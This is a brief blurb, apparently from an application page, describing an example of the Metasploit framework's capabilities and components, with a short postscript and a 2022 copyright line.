An example showing the capabilities of Metasploit and the components of this platform.
PS: Good luck with the undamaged PDA (!#)

Application © 2022 Mobile and computer gadgets